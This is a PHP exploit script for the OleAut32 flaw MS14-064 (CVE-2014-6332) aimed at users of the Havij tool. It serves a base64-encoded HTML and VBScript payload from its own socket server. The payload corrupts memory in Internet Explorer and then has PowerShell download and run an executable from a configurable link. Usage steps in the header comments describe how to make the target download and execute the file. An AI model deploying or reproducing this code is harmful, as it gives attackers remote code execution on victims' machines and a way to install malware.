Havij OLE Automation Array Remote Code Execution

1. #!/usr/bin/php
2. <?php
3. # Title : Havij OLE Automation Array Remote Code Execution
4. # Affected Versions: All Version
5. # Founder : ITSecTeam
6. # Tested on Windows 7 / Server 2008
7. #
8. #
9. # Author : Mohammad Reza Espargham
10. # Linkedin : https://ir.linkedin.com/in/rezasp
11. # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
12. # Website : www.reza.es
13. # Twitter : https://twitter.com/rezesp
14. # FaceBook : https://www.facebook.com/mohammadreza.espargham
15. #
16. #
17. # OleAut32.dll Exploit MS14-064 CVE2014-6332
18. #
19. #
20. # 1 . run php code : php havij.php
21. # 2 . open "Havij" and Enter your exploit link http://ipaddress:80/
22. # 3 . go to "Setting" and Click "Load Cookie"
23. # 4 . Your Link Download/Execute on your target
24. # 5 . Finished ;)
25.  
26. #Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY
27.  
28. $port=80; # Port Address
29. $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link
30.  
31. $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
32. socket_bind($reza, 0,$port);
33. socket_listen($reza);
34. print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n";
35.  
36. $msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11
37. bGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj
38. cmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl
39. bGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy
40. ZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG
41. SUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh
42. dGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl
43. cnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1
44. bmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg
45. YWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg
46. IHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt
47. eWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4
48. dAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w
49. KSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv
50. LCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu
51. Zm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1
52. bmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p
53. dCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp
54. JmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm
55. Y2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw
56. MCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50
57. LndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg
58. ICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg
59. ICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K
60. IApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy
61. ZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp
62. b24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD
63. cmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg
64. ICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm
65. dW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u
66. IEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg
67. UHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo
68. MCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo
69. Mik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g
70. IFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt
71. b2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt
72. KGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv
73. ICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo
74. ZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl
75. cnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg
76. ICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg
77. ICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg
78. Zm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2
79. NzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog
80. ICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl
81. cj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK
82. ICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog
83. ICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz
84. NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg
85. IElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u
86. PDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg
87. ICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9
88. bWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu
89. ICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g
90. ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg
91. ICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK
92. ICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg
93. ICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK
94. ICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg
95. ICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0
96. eXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK
97. ICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg
98. ICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92
99. ZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg
100. ICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp
101. bSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu
102. Y3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl
103. cnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg
104. IGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg
105. IAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv
106. bgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg==';
107. $msgd=base64_decode($msg);
108. $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd);
109.  
110. for (;;) {
111. if ($client = @socket_accept($reza)) {
112. socket_write($client, "HTTP/1.1 200 OK\r\n" .
113. "Content-length: " . strlen($msgd) . "\r\n" .
114. "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
115. $msgd);
116. print "\n Target Checked Your Link \n";
117. }
118. else usleep(100000);
119. }
120.  
121.  
122. ?>